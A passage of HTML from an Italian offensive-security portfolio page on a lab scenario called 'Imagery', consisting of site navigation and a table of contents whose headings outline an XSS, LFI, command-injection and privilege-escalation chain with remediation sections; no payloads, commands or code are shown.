
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
        <meta name="description" content="Reportistica tecnica, assessment AD/Web/Network, threat modeling e remediation strategy.">
      
      
        <meta name="author" content="Ing. Marco P.">
      
      
        <link rel="canonical" href="https://marcop-sed.github.io/portfolio/imagery/">
      
      
        <link rel="prev" href="..">
      
      
        <link rel="next" href="../expressway/">
      
      
        
      
      
      <link rel="icon" href="../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.7.6">
    
    
      
        <title>Web Application - Imagery - Marco Pulicanò - Offensive Security & Engineering Portfolio</title>
      
    
    
      <link rel="stylesheet" href="../assets/stylesheets/main.484c7ddc.min.css">
      
        
        <link rel="stylesheet" href="../assets/stylesheets/palette.ab4e12ef.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CJetBrains+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"JetBrains Mono"}</style>
      
    
    
    <script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="cyan">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#esercitazione-di-laboratorio-scenario-imagery" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow md-header--lifted" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href=".." title="Marco Pulicanò - Offensive Security &amp; Engineering Portfolio" class="md-header__button md-logo" aria-label="Marco Pulicanò - Offensive Security & Engineering Portfolio" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Marco Pulicanò - Offensive Security & Engineering Portfolio
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Web Application - Imagery
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="cyan"  aria-label="Dark Mode"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Dark Mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="cyan"  aria-label="Light Mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Light Mode" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
        <div class="md-search__suggest" data-md-component="search-suggest"></div>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
  </nav>
  
    
      
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href=".." class="md-tabs__link">
        
  
  
    
  
  🏠 Home

      </a>
    </li>
  

      
        
  
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="./" class="md-tabs__link">
          
  
  
  🔴 Offensive Security

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../eth/" class="md-tabs__link">
          
  
  
  ⚙️ Projects

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
    
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href=".." title="Marco Pulicanò - Offensive Security &amp; Engineering Portfolio" class="md-nav__button md-logo" aria-label="Marco Pulicanò - Offensive Security & Engineering Portfolio" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    Marco Pulicanò - Offensive Security & Engineering Portfolio
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href=".." class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    🏠 Home
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
    
    
      
        
        
      
      
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" checked>
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="">
            
  
  
  <span class="md-ellipsis">
    
  
    🔴 Offensive Security
  

    
  </span>
  
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            
  
    🔴 Offensive Security
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  
  <span class="md-ellipsis">
    
  
    Web Application - Imagery
  

    
  </span>
  
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  
  <span class="md-ellipsis">
    
  
    Web Application - Imagery
  

    
  </span>
  
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#1-executive-summary" class="md-nav__link">
    <span class="md-ellipsis">
      
        1. Executive Summary
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-metodologia-applicata" class="md-nav__link">
    <span class="md-ellipsis">
      
        2. Metodologia Applicata
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2. Metodologia Applicata">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#21-framework-di-reference" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.1 Framework di Reference
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#22-scope-dellengagement" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.2 Scope dell'Engagement
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-attack-path-kill-chain" class="md-nav__link">
    <span class="md-ellipsis">
      
        3. Attack Path (Kill Chain)
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-proof-of-concept-poc-ed-evidenze-tecniche" class="md-nav__link">
    <span class="md-ellipsis">
      
        4. Proof of Concept (PoC) ed Evidenze Tecniche
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4. Proof of Concept (PoC) ed Evidenze Tecniche">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#41-reconnaissance-initial-enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.1 Reconnaissance &amp; Initial Enumeration
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#42-owasp-a072021-cross-site-scripting-xss-blind-variant" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.2 OWASP A07:2021 – Cross-Site Scripting (XSS) – Blind Variant
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.2 OWASP A07:2021 – Cross-Site Scripting (XSS) – Blind Variant">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#identificazione-della-vulnerabilita" class="md-nav__link">
    <span class="md-ellipsis">
      
        Identificazione della Vulnerabilità
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-blind-xss-payload" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation – Blind XSS Payload
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#43-manipolazione-di-sessione-accesso-admin-panel" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.3 Manipolazione di Sessione &amp; Accesso Admin Panel
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#44-owasp-a012021-local-file-inclusion-lfi" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.4 OWASP A01:2021 – Local File Inclusion (LFI)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.4 OWASP A01:2021 – Local File Inclusion (LFI)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#identificazione-della-vulnerabilita_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Identificazione della Vulnerabilità
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-source-code-disclosure" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation – Source Code Disclosure
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#45-credential-extraction-password-cracking" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.5 Credential Extraction &amp; Password Cracking
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.5 Credential Extraction &amp; Password Cracking">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#database-leak-analysis" class="md-nav__link">
    <span class="md-ellipsis">
      
        Database Leak Analysis
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#hash-identification-cracking" class="md-nav__link">
    <span class="md-ellipsis">
      
        Hash Identification &amp; Cracking
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#46-owasp-a032021-os-command-injection-via-image-processing" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.6 OWASP A03:2021 – OS Command Injection via Image Processing
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.6 OWASP A03:2021 – OS Command Injection via Image Processing">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#vulnerability-discovery-in-source-code" class="md-nav__link">
    <span class="md-ellipsis">
      
        Vulnerability Discovery in Source Code
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-strategy" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation Strategy
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#proof-of-concept-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      
        Proof of Concept: Reverse Shell
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#47-privilege-escalation-lateral-movement-to-mark" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.7 Privilege Escalation – Lateral Movement to 'mark'
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.7 Privilege Escalation – Lateral Movement to &#39;mark&#39;">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#enumerazione-utenti-di-sistema" class="md-nav__link">
    <span class="md-ellipsis">
      
        Enumerazione utenti di sistema
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#credential-reuse-attack" class="md-nav__link">
    <span class="md-ellipsis">
      
        Credential Reuse Attack
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#48-privilege-escalation-root-access-via-charcol-cronjob" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.8 Privilege Escalation – Root Access via Charcol + Cronjob
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.8 Privilege Escalation – Root Access via Charcol + Cronjob">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#enumerazione-privilegi-sudo" class="md-nav__link">
    <span class="md-ellipsis">
      
        Enumerazione privilegi sudo
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#analisi-di-charcol" class="md-nav__link">
    <span class="md-ellipsis">
      
        Analisi di Charcol
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-via-cronjob" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation via Cronjob
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#activation-root-access" class="md-nav__link">
    <span class="md-ellipsis">
      
        Activation &amp; Root Access
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#root-flag" class="md-nav__link">
    <span class="md-ellipsis">
      
        Root Flag
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-remediation-hardening-proposte" class="md-nav__link">
    <span class="md-ellipsis">
      
        5. Remediation &amp; Hardening (Proposte)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5. Remediation &amp; Hardening (Proposte)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#51-mitigazione-delle-vulnerabilita-identificate" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1 Mitigazione delle Vulnerabilità Identificate
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5.1 Mitigazione delle Vulnerabilità Identificate">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#511-cross-site-scripting-xss-owasp-a072021" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.1 Cross-Site Scripting (XSS) – OWASP A07:2021
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#512-local-file-inclusion-lfi-owasp-a012021-cwe-22" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.2 Local File Inclusion (LFI) – OWASP A01:2021 / CWE-22
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#513-os-command-injection-owasp-a032021-cwe-78" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.3 OS Command Injection – OWASP A03:2021 / CWE-78
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#514-weak-password-storage-cwe-916" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.4 Weak Password Storage – CWE-916
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#515-unauthorized-admin-access-cwe-639" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.5 Unauthorized Admin Access – CWE-639
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#516-sudo-misuse-cwe-269" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.6 Sudo Misuse – CWE-269
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#52-compliance-standards-mapping" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.2 Compliance &amp; Standards Mapping
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#53-testing-validation-roadmap" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.3 Testing &amp; Validation Roadmap
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#6-conclusioni" class="md-nav__link">
    <span class="md-ellipsis">
      
        6. Conclusioni
      
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../expressway/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Network & Crypto - Expressway
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../darkzero/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    AD Infrastructure - DarkZero
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../signed/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Kerberos & SQL - Signed
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    
  
    ⚙️ Projects
  

    
  </span>
  
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            
  
    ⚙️ Projects
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../eth/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Boot2Root Design - Waifu Gallery
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#1-executive-summary" class="md-nav__link">
    <span class="md-ellipsis">
      
        1. Executive Summary
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-metodologia-applicata" class="md-nav__link">
    <span class="md-ellipsis">
      
        2. Metodologia Applicata
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2. Metodologia Applicata">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#21-framework-di-reference" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.1 Framework di Reference
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#22-scope-dellengagement" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.2 Scope dell'Engagement
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-attack-path-kill-chain" class="md-nav__link">
    <span class="md-ellipsis">
      
        3. Attack Path (Kill Chain)
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-proof-of-concept-poc-ed-evidenze-tecniche" class="md-nav__link">
    <span class="md-ellipsis">
      
        4. Proof of Concept (PoC) ed Evidenze Tecniche
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4. Proof of Concept (PoC) ed Evidenze Tecniche">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#41-reconnaissance-initial-enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.1 Reconnaissance &amp; Initial Enumeration
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#42-owasp-a072021-cross-site-scripting-xss-blind-variant" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.2 OWASP A07:2021 – Cross-Site Scripting (XSS) – Blind Variant
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.2 OWASP A07:2021 – Cross-Site Scripting (XSS) – Blind Variant">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#identificazione-della-vulnerabilita" class="md-nav__link">
    <span class="md-ellipsis">
      
        Identificazione della Vulnerabilità
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-blind-xss-payload" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation – Blind XSS Payload
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#43-manipolazione-di-sessione-accesso-admin-panel" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.3 Manipolazione di Sessione &amp; Accesso Admin Panel
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#44-owasp-a012021-local-file-inclusion-lfi" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.4 OWASP A01:2021 – Local File Inclusion (LFI)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.4 OWASP A01:2021 – Local File Inclusion (LFI)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#identificazione-della-vulnerabilita_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Identificazione della Vulnerabilità
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-source-code-disclosure" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation – Source Code Disclosure
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#45-credential-extraction-password-cracking" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.5 Credential Extraction &amp; Password Cracking
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.5 Credential Extraction &amp; Password Cracking">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#database-leak-analysis" class="md-nav__link">
    <span class="md-ellipsis">
      
        Database Leak Analysis
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#hash-identification-cracking" class="md-nav__link">
    <span class="md-ellipsis">
      
        Hash Identification &amp; Cracking
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#46-owasp-a032021-os-command-injection-via-image-processing" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.6 OWASP A03:2021 – OS Command Injection via Image Processing
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.6 OWASP A03:2021 – OS Command Injection via Image Processing">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#vulnerability-discovery-in-source-code" class="md-nav__link">
    <span class="md-ellipsis">
      
        Vulnerability Discovery in Source Code
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-strategy" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation Strategy
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#proof-of-concept-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      
        Proof of Concept: Reverse Shell
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#47-privilege-escalation-lateral-movement-to-mark" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.7 Privilege Escalation – Lateral Movement to 'mark'
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.7 Privilege Escalation – Lateral Movement to &#39;mark&#39;">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#enumerazione-utenti-di-sistema" class="md-nav__link">
    <span class="md-ellipsis">
      
        Enumerazione utenti di sistema
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#credential-reuse-attack" class="md-nav__link">
    <span class="md-ellipsis">
      
        Credential Reuse Attack
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#48-privilege-escalation-root-access-via-charcol-cronjob" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.8 Privilege Escalation – Root Access via Charcol + Cronjob
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.8 Privilege Escalation – Root Access via Charcol + Cronjob">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#enumerazione-privilegi-sudo" class="md-nav__link">
    <span class="md-ellipsis">
      
        Enumerazione privilegi sudo
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
